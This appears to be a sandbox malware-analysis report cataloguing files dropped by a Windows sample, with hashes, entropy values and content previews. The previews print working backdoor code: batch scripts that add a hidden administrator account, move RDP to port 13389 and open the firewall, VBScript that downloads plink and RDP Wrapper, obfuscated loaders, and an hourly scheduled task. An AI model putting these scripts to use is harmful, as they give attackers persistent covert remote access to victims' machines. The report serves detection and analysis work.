                                                                              Preview:EA06......Z.J.R.T..;... .Yo.Hl*.i..,.;|.Av.[.K-.....n..}..F......^.c.Zn.Iu..e..,.....c.J$@......5..e..nwK-..s.)L6.s.A.v.-......| .... .m..p.Zn@..........u..n.ZnV.u..n.T. .b.(.I@.....%.Jd.i..."....M..a.Z.....u\.\..{... ..nu... ...K-....Zm...Kh.]..9._t.Ye.[...h.[-2....t.I,6.}..t.^e...2.t...s)}.....,....."..i.Z..)u..m.......r.K.VK........-..e.......o..%.i..m..K.&...Z...u..p.....u.H...."Qp..)..m.Y ..g..H.i.........A.....r......Ba 8(..=...........|`3U....X.7KM..._.....{..V.p...'..u$..... ....F.2....y.YnVP..K$.@....v.-..(..&.....n..(....K..[.....d..f]D....P...NEi...............n.a....(...X..P..[.....?.}.....Qm.I.&..... j.6.F..`W....T..yE2.n..:.....t..l6+...f..-6.]..n...7+...v../7...e3.Mf.y......m6...b...o..@.Q(.D@.....m..!.5.. ...2...@......3....h..M....H)6..D.H%...fW ..d...H.......`........q.....l.....e.M%.....s.....d.....o..d..o..........~*m..P.K...m..c.)-.It.]0.."....A'...0.h..(.+(.X.<.....@.....^n.Y..i.K..2.?..B..>.*..e..=...UK}..n....4.=.5n...._......`...@.v.M.
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2982
                                                                              Entropy (8bit):7.596207219569419
                                                                              Encrypted:false
                                                                              SSDEEP:48:FjBRdV59IEpuM5QYInaN/ueL0g3O/rmCGv0Iyze3UCIZB49ECWUhS71i0Rt:fRfzgFTnaNme4ckiCGcIyzor3ei0z
                                                                              MD5:E68D32C64E7A9F5B346950DDABF72670
                                                                              SHA1:BACCAAA7ABF72421EFF6BFDF36D6EF10CCB77C52
                                                                              SHA-256:6971CAC146911AD09D7A4D56084D3239007C5D932083004616AF64DD96A51EC3
                                                                              SHA-512:4074C32AD02F0B39D68F99D55582499838CCEF9ACADDAC16D5E058792034E69CD32294A71D5A7CE819786010823C1B5EC39B42B874A3E7A3CE405CD9A0D57ECC
                                                                              Malicious:false
                                                                              Preview:EA06..$..]lV.M.AF..wKM.. .\.6..r..,W.... .Yo.Id..3..-.S..Q..)..A=.Ld.K|..e.J.....@..Xg.....d....Y..f.X@.....h...........`...g$.......K...(...r.m...x.,2..S ..F...... ....N..!..l*.n..n......J.n.[.;...n..$.+.X.|...T....[4KM..I.H-..p.)a....o.\..e..T..`...b..,.k=..j..-..}..r....k...z..tJ-..H..t.m:.P..uJ.Z.X..@...Z.R....o.....(.]..F@*.i.Y@......Y`............. ..R..&.t.J...h..+..eU+u.V..Je.. .N@L.......(`.#...@H[5..,.Y.2....,.\.......,...;...t...V.-..(.T.w+M....K..e..y..,....H. ...."...[.....Ynw[m..N..f.k...L....Eo.Y..}6.P..).....:.T.V.=..m..-7:.J.P.U.V....r.H.@..E..t..n.@..r..".....s.K..+..]g..-.[...e.X....t.X...}..m.\...}..p.....m....K.V.t..7.........:...XnvY..n...Y@..s...... .....}b.L......`....w@..=.z.dT...l.K...m..c.W.4..a".J@.....z...p..(..(....X.2 ._...r....T..,.,..i..7....n..... ..u.....e..k.R.[.V.u..y.B..\.9.....K.8...N..-.. ....S.....o..Y@..I<].`..... ...@..@:.......M.....A$......@...H.;..e..n@........W Q.X./..o.....G?.....-..a`....k....d.S..,b{1.+...t.G
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):882
                                                                              Entropy (8bit):7.425166218139306
                                                                              Encrypted:false
                                                                              SSDEEP:24:n+o8oRmIsDg1rykjNsxcBRyZh2Pw4myXx8XKR2V:+otRUDg1mSNCcJmCR2V
                                                                              MD5:90A6B17ADC2F59A75CDC3FC366BA7BA4
                                                                              SHA1:6A7930DD88163F5C088CD968E6EEDFC10CA5E8A8
                                                                              SHA-256:F7D078E158D80864DCCAD7E35D5E8FD080F846CE19726E5339E1E2C2F51B0E57
                                                                              SHA-512:6D4C3AA718B5CA4518064DFE2A60A3BD355A8E0E5213057141E4AA2426CB501EA17B2D434BC8232B9CF8A8E4AAF7BD8F94866611AFA5F579A7584BB4B280DA36
                                                                              Malicious:false
                                                                              Preview:EA06...~.H,.;E.Ao.Y......l...6...Aa.[m6.~.i.OdU9l.[5...R..i".....m..,.....r.%.&.P.]Y......t..fs9...........,.+}...Q....i..@.P.lH...-.. .Wd.....,.....m..%.k...e.f,...._f.H..[e..s....,.. ....<.E%.Rd.)..S .[......l..7........v...l.J...@+4....<.Y....`._.@.'..q...6.}..n..f ..Xnw9.d.:.....A%.#...(..%.K.6K .... ..I@G.I(....~..........~[...o...9...a.\...=.uu..........Yl.3.A".R...N.F.U.5*-r.i...;}..\..m.K}.. .U+.;...e.]*.....n..@.@...p...6.e...5...L... ...G.I.J.G..*....A/.q&..9.&... ..Ff.k.[k.:.N.E..:.o.].V.eN.t....T..N...AS...[...S.Xn..e.R.T%.K.....T..Ju..b..@..$...RP.x....!K...r...6.d..'`.M..l..5S.... .Y@..".\.V.5..e..m....o.........L3....w.Y-7)..X......|.......h..9.....m.......-..*.+-....X..m..c.]@a....h.H..[u.uP.[..+.....\.@.?....p.Xn...O....D..w[..qS..n..@..s..$..(..S...._.5..c...r...t....N.s.Ym.9.r.s..7....x..@..U....Zm.[}.....f..P.. ....K...
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9399
                                                                              Entropy (8bit):5.2787181340236815
                                                                              Encrypted:false
                                                                              SSDEEP:192:9FwfFxcV7S5y1Z87o0N8/TQN5yF/Bzb5cUxwRKB2:Cy1Z8km8/EaB2
                                                                              MD5:C3D2E2CCD47E66FBA54C582BF5B09A2C
                                                                              SHA1:176455067DCC15E2CC309ACC25A012D23326EFBD
                                                                              SHA-256:C8B96C7092DD44A961562790BB1712012DDFD6F6764AC6A57ED0075FB1E832C4
                                                                              SHA-512:D57634CBEBBD14070813C779D7E1E7D3CE3C5449BB0189176E601237E5D8A9A92980DF1F18D0F8898F3A5541F32104B4F89D1645A0CB355E7B60F90FF2711628
                                                                              Malicious:true
                                                                              Preview:Public Function transform(byval text, byval key)..For i = 1 to len(text).. a= i mod len(key): if a = 0 then a = len(key).. transform = transform & _.. chr(asc(mid(key,a,1)) xor asc(mid(text,i,1)))..Next....End Function..Function RandomString( ByVal strLen ).. Dim str, min, max.. Const LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ".. min = 1.. max = Len(LETTERS).. Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Dim fso, f1, ts, s.. Set fso = CreateObject("Scripting.FileSystemObject")..Str = "On Error Resume Next" & vbCrLf & _.."obf_HOMEPATH=""C:\Program Files\RDP Wrapper\""" & vbCrLf & _.."obf_autoupdateUrl=""https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat""" & vbCrLf & _.."Function obf_Base64Encode(obf_sText)" & vbCrLf & _.." Dim obf_oXML,obf_oNode" & vbCrLf & _.." Set obf_oXML=CreateObject(""Msxml
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2251
                                                                              Entropy (8bit):5.140016348549468
                                                                              Encrypted:false
                                                                              SSDEEP:48:0MT7ObieFxfHjHT846dWIoWILIz7L6SdPUa:ZaFxPjIJWpW2QqSdl
                                                                              MD5:E526DA1842354849CFC018128001A6B4
                                                                              SHA1:921F1AB5499EB550A351D4A394BD44DF5D173EA5
                                                                              SHA-256:563DD781DD63543F7EE67747F044FBD77877CD46E34DF7DE1C96F287EEB39B14
                                                                              SHA-512:79B4F306F9D89AF12441FB6DF2221A0FF8B9124FF23FADCA037ED2319EB6A989BC94595598C49B61ED2E8DC12015B68190E59B7658EEAF1825D8D37DE2586865
                                                                              Malicious:false
                                                                              Preview:Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[script_path] [arg]") _.. , WScript.Arguments _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..Dim sT : sT = Join(Array( _.
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2218
                                                                              Entropy (8bit):5.143041689578078
                                                                              Encrypted:false
                                                                              SSDEEP:48:0MT7ObieFxfHjHT846dboWILIziL6SdPLE:ZaFxPjIJMW2Q3SdDE
                                                                              MD5:D427D2ED9DB86D08B38F5F8B5EEC4493
                                                                              SHA1:5CFE9F751BAD99009ABF1A642EEC8F7C67870051
                                                                              SHA-256:7D0CB57BA7D2AF6FF75A9C203D1338CE31199D07EECA391E9A82FEDCBE068512
                                                                              SHA-512:FC381EC4B2DCDFD10D55D5D317E7A6011DA9A859A7E98A84D49391637AA22EAF983875C9BF5BAD8403B006566D4053D8F8946D3CBD52A433EAC60C26F73CF659
                                                                              Malicious:false
                                                                              Preview:Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[script_path]") _.. , Array(WScript.Arguments.Item(0)) _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..Dim sT : sT = Join(
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2312
                                                                              Entropy (8bit):5.1464735332086144
                                                                              Encrypted:false
                                                                              SSDEEP:48:0MT7ObieFxfHjHT846dGCoWILIz7L6SdPZW:ZaFxPjIJGvW2QqSdo
                                                                              MD5:193242114C1738D0EA04AA93659FDD5A
                                                                              SHA1:A929CC1CFBE44BA8A99117DFD7819776AB45D465
                                                                              SHA-256:C879379224BC8DC4A4F495F989711714A936892B11E7A1CF6E7B79654DC8F928
                                                                              SHA-512:46825C3CC42C3C2E86A3890B29B3A2CF9B30E892D0D38BFB2E3334FFA3951B8F732B2786BDFFA528EE6FF05C789C35E963F069D54680C3E16735165072E6FEC4
                                                                              Malicious:false
                                                                              Preview:Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[username] [password] [script_path] [bat_path]") _.. , WScript.Arguments _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..D
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2970
                                                                              Entropy (8bit):5.212134107492503
                                                                              Encrypted:false
                                                                              SSDEEP:48:0MT7ObieFx6xqHT846di8poWpD13RNVR4VWBp0AOgNgaG6G6pLVrntZ9:ZaFx6qIJi8GWFpDEmPRRBhtX
                                                                              MD5:0884B6E1AAF279208FE5F97CBFA85276
                                                                              SHA1:388F310A0D62A3362DB22659E93CB6CB517C21B8
                                                                              SHA-256:490C84854174FA43F15D9CA2967578ED5AA614F5327CCCCB5CB6BA589DB3AEB6
                                                                              SHA-512:68D515E3660306E7E6C7A5661B41232E6A19788EF05D614962F64873056DCC8A5489C4D1AC22AD2E3F632D6C4E7497A40D0511527F0AC1A8E0DFF7366731EEAD
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....outFile = Wscript.Arguments.Item(2).....Dim objFile : Set objFile = objFSO.CreateTextFIle(outFile, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[username] [password]") _..., Array(Wscript.Arguments.Item(0), Wscript.Arguments.Item(1)) _..)..Dim r : Set r = New RegExp..
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4044
                                                                              Entropy (8bit):5.31725129526118
                                                                              Encrypted:false
                                                                              SSDEEP:96:ZZraPFyUNA56qFpAf99ijyRXI7bpYff85pH1Ys8:ZZEFyUG5bAf9kjyRXI7F4fwHs
                                                                              MD5:9D9DB5D38F36F9FE0507B6B1E92DB580
                                                                              SHA1:CF3540ADC4492B9C7BF834A330B44FBF9A48E62B
                                                                              SHA-256:ED2AB7CD78D55ECAC4B6BF9A83C7E9CC3ED661C0812E2F8EE9E5E94B6076B506
                                                                              SHA-512:601DE6AAF76536DDB54464EB3C9521F69A37F56AC38646F9676B0019D2BEB74D27353189EF702817EC07859AA737E6998FFEA6120B0DCA20D2E05825F68F864D
                                                                              Malicious:false
                                                                              Preview:ON ERROR Resume Next..Dim fso, vFolder..Set objFso = WScript.CreateObject("Scripting.FileSystemObject")..set shell = CreateObject("WScript.Shell")..appdir = shell.expandEnvironmentStrings("%appdata%") & "\"..mainPath = "C:\Program Files\RDP Wrapper\"..link1 = "https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe"..link2 = "https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip"..main..Sub unzip(pathName, fileName)...If isFile(pathName & fileName) Then....Set fso=CreateObject("Scripting.FileSystemObject")....Set shell=CreateObject("Shell.Application")....Set files = shell.NameSpace(pathName & fileName).Items....shell.NameSpace(mainPath).CopyHere files, 4....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & fileName)....getfile.Delete....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & "install.bat")....getfile.Delete....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & "uninstall.bat")....getfile.Delete....WScript.Sleep(100)....S
                                                                              Process:C:\Windows\SysWOW64\cscript.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3817
                                                                              Entropy (8bit):5.432101891893751
                                                                              Encrypted:false
                                                                              SSDEEP:48:esIDaR2debTKky9/C9Ru1TrBia5Gt4qm9PmVIZs7rbQ9cceAylxOcfAxP74:eLdWGwXuFPo4EaZs7HQ9cpnfA974
                                                                              MD5:06C18E67C03C25B9513D90F8275271B4
                                                                              SHA1:100008661F21AF9C6A5A51683DE0F278E0DFB483
                                                                              SHA-256:9C482545DC24B34AE93BDE1621E2AB5AC828690BD7280D395BF317B64714A344
                                                                              SHA-512:6CBC2579DDB7AB93C90CA1987F289EC06874A933A1582C474FB9C67FB9FC22815F9CD1FCB03CCFD9A8E563BFA662EE2EB96D7DA880ACCA6158B741BE0A0B6BC3
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:On Error Resume Next..zD="C:\Program Files\RDP Wrapper\"..ka="https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat"..Function vt(zx).. Dim sT,GV.. Set sT=CreateObject("Msxml2.DOMDocument.3.0").. Set GV=sT.CreateElement("base64").. GV.dataType="bin.base64".. GV.nodeTypedValue=UZ(zx).. vt=GV.text.. Set GV=Nothing.. Set sT=Nothing..End Function..Function CE(ByVal vCode).. Dim sT, GV.... Set sT = CreateObject("Msxml2.DOMDocument.3.0").. Set GV = sT.CreateElement("base64").. GV.dataType = "bin.base64".. GV.text = vCode.. CE = yK(GV.nodeTypedValue).. Set GV = Nothing.. Set sT = Nothing..End Function..Function UZ(Text).. Const CW=2.. Const tF=1.. Dim eU.. Set eU=CreateObject("ADODB.Stream").. eU.Type=CW.. eU.CharSet="us-ascii".. eU.Open.. eU.WriteText Text.. eU.Position=0.. eU.Type=tF.. eU.Position=0.. UZ=eU.Read.... Set eU=Nothing..End Function..Function yK(Binary).. Const CW = 2.. Const adTypeBinary = 1..
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1374
                                                                              Entropy (8bit):5.210805270439001
                                                                              Encrypted:false
                                                                              SSDEEP:24:2CYg1Yvcf7cE8Jyb7eftTy1tGvUv5jaxV2MZKh3TDsd5aTEubQubQaLUauEW6QMR:jd1S7tJy2ZyVyp0dUaw/iLHr9
                                                                              MD5:16F9ADDCB09C55B18B71E33ACE303845
                                                                              SHA1:ADD094205A27FA7987C53AC2D8F40475DFB419D6
                                                                              SHA-256:FA3F24047A068BAF9FA641408F54EEB0630AB39DFC3E3FFA0D87ECD1BA0439E3
                                                                              SHA-512:EDF6A09BFD7806EFC548846E1EBAAC0921A9C0023F555888F890CF524B5541377DBD6B16DB3E7E54E04F511E5278C8555AEC61F822312211C62D3F9B8BC2B2D3
                                                                              Malicious:true
                                                                              Preview:@ echo off..setlocal..set admins_sid="S-1-5-32-544"..set remote_users_sid="S-1-5-32-555"..set rdp_port=13389..set "wmic=wmic group where sid=%admins_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>null set "%%i"..set admins_group_name=%name%....set "wmic=wmic group where sid=%remote_users_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>null set "%%i"..set remote_users_group_name=%name%....set login=fsUIwEqMAc..set pass=zyTFxcsIkA..net user %login% %pass% /add..net localgroup %admins_group_name% %login% /add..net localgroup %remote_users_group_name% %login% /add..net accounts /maxpwage:unlimited..reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %login% /t REG_DWORD /d "00000000" /f..reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d %rdp_port% /f..netsh advfirewall firewall add rule name="RDP Port %rdp_port%" profile=any protocol=TCP acti
                                                                              Process:C:\Windows\SysWOW64\cscript.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):835
                                                                              Entropy (8bit):5.181438124222707
                                                                              Encrypted:false
                                                                              SSDEEP:12:TMHdGa4+DWCOvCONsbOn0EpdDOfqZvljYCO0xMGTeSyL6ls1whowh/LO7sgYrHwz:2dH4+S3vdjpdYd0xT1yL6Vh7hT4WWpn
                                                                              MD5:F6BCEC1FBFAA6DD76D1B40439FA57068
                                                                              SHA1:62531D18080DD8B116D41458DAC4ABE5F352B135
                                                                              SHA-256:994D5558269ACD84E36C5D0B42A017BB79D91B042B87671CA6E4F83930606225
                                                                              SHA-512:9D0D776FA8A9CFC7521677EFE8EDF56965DDD9A1B0EA959F6D14BA6AF422DA5A547D634C8CB0DE709BE383C0352510920B42E53FBB857A4C530EB83861864EDE
                                                                              Malicious:true
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <TimeTrigger>.. <Repetition>.. <Interval>PT1H</Interval>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2019-10-30T05:02:00</StartBoundary>.. <Enabled>true</Enabled>.. </TimeTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <AllowHardTerminate>true</AllowHardTerminate>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Priority>7</Priority>.. </Settings>.. <Actions Context="Author">.. <Exec>.. <Command>C:\Users\user\AppData\Roaming\UeNuQ\939.vbs</Command>.. </Exec>.. </Actions>..</Task>
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1406
                                                                              Entropy (8bit):5.156023391995164
                                                                              Encrypted:false
                                                                              SSDEEP:24:2CYg1Yvc9Kl7cc8Jy27evtTykSvUvjrjaxV2MZKh+uTDsd5aTEubQubQaLUauEWZ:jd1SKJ1Jy3pyWHyp0sQUaw/iLHri
                                                                              MD5:6D19B2702B77A20B89818484CBC83506
                                                                              SHA1:F42DBD3AB3C60EA9952E2A0F66826E153F89D943
                                                                              SHA-256:042EF6E3349EDEF436E425A5EC5D7C23F49A93F2866AE31C10ADA08E9E012D5F
                                                                              SHA-512:184E47C8AAA2E8A391E08BA2C5932C6A16B620303C4C985DF9E149770A866E8E3948A027150070044CDB56ADFB11AD8B8CBD5979E78A0FBF444868CAB9B4A285
                                                                              Malicious:true
                                                                              Preview:@ echo off..setlocal..set admins_sid="S-1-5-32-544"..set remote_users_sid="S-1-5-32-555"..set rdp_port=13389....rem admins group..set "wmic=wmic group where sid=%admins_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>nul set "%%i"..set admins_group_name=%name%....rem remote users..set "wmic=wmic group where sid=%remote_users_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>nul set "%%i"..set remote_users_group_name=%name%....set login=%1..set pass=%2....net user %login% %pass% /add..net localgroup %admins_group_name% %login% /add..net localgroup "%remote_users_group_name%" %login% /add..net accounts /maxpwage:unlimited..reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %login% /t REG_DWORD /d "00000000" /f......reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d %rdp_port% /f..netsh advfirewall firewall add rule name="RDP Port %rdp_port%"
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):152253
                                                                              Entropy (8bit):5.776859111219554
                                                                              Encrypted:false
                                                                              SSDEEP:3072:IaM5g03DpPy1ILn3V4GKQZuriTtrxIjq9lwAbV0fzISnr+7/C3T/C4N2P/CpKYN:IaM+KPbdHxujMuAb2Lni7/CD/C4oP/CL
                                                                              MD5:26D71780D392B15532AED9E37216F162
                                                                              SHA1:4EBE507D17371EBA5C6885BFCDAD1EE3358747E3
                                                                              SHA-256:A6CC34F6068C12B795875FC277023D533E35E4C9A6E042B37C1B9DEDB84829CC
                                                                              SHA-512:83C433DDAD2B24FFBD1EBE8056D0742F5CE4D9998E6F6A1F50621AB37B0E4378373F692F134EDC65719F9FFB2EC820153C5FA38CFB1BDF92AA38A41AA728EBC2
                                                                              Malicious:false
                                                                              Preview:ExEmeFEONYoqEvSCinzANgVzIiPAfHtQSpbNuSBezDsOUqaPzkyIamydmlRVPrmuUaixZycgXsup=imIOZutBvbatihVwFjfrkUCSXQgPQKqaWzsLoiQXcEbUPdRRmjatQyKjWPQpSgLMbqiNWlTbvaIHbIrGYbfDaVCQJtOzdGyiSKvOorVfzUInbrPhMplcZizBnstRcmiPhBOMkgbUBqpnhraFfBGuvKiLsVdRZrTTMTkWgrwnLfTZYVhxZnCUTqaDzrcdXGV..ifLxScskmocuRoNcHWRABYqMAHDkILAyxxRIlTBDidcKFjMldZIqOxWofYTlSyD=HfMvdtkOcgzlCfigVaUIrAdZnJzkZdLwNIefmfTkOUFAwLFZRFfmkUJiZMXHLZOtCsbUhSOFnJUpUPYMrxxzwjQSYVfNajAOyBYKgKLYRJqBqAhpOkEsFxefAEWaCwhjoytzRhnaIcCajgSnHuYuIopKnIlJOzvQcNzUcUsAMk..pSKrkLnKceuEZWzUprOEgZMWnVYeNObxvmqSOEYXfJqNgpzYeZobYGxpyNFfNvWGEMiAVA=FtQgEZZIgCZZNGqcQtQNwYJpTMzoCeTeBTCaiaPlutsNOvpZEssctNtGcGcSFQujJWnTrHgbfGGWHVcvDzEkKnYNPWXAW..FdYttRYfVXeTuniiZmkYfkjVBlYKtiJNBsqdXCREnhbHoRamGHWbfYIztrDTSgkOhgaObRlvHGAwNE=KSmtvlknCJGjTZYLpeJzTnDwPbmPIbHGmdTqzlODwQPyQFdbJVdYtkTkgbgYKcQyeqMCyXaZhyarJnllieuNuICgbHMVVPSFZKrPSNsMCsKYSQBQjtRIfrYznnynlbtbhNrYcxsxKzlPXDcHyVIQYlfWMJszHTBthhLyMDcSM..YWSovUrnafPhmebujLrYMQRuCKSdUCAQrBjatDhvdpBjfZNIHGdJOOKiyMGLeMD=OZpYQyeJnHHCfE
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):361472
                                                                              Entropy (8bit):7.999478480947453
                                                                              Encrypted:true
                                                                              SSDEEP:6144:vb1JGfcuWETWuf9gWugBxGOK3BzK8hb49UodCPkxFALtWpTTkhZq63:vhq7VyWlxtiNK8hk5EWKtWpTTkR
                                                                              MD5:19C1BAC572EDF51745B04E858508C2A8
                                                                              SHA1:5629A972D32CC955F6C22AEFB4832CC30CC24B8A
                                                                              SHA-256:F9D52F9539BC9007576369869760D889BC4EA31C641EA051CF6BC496CE58497B
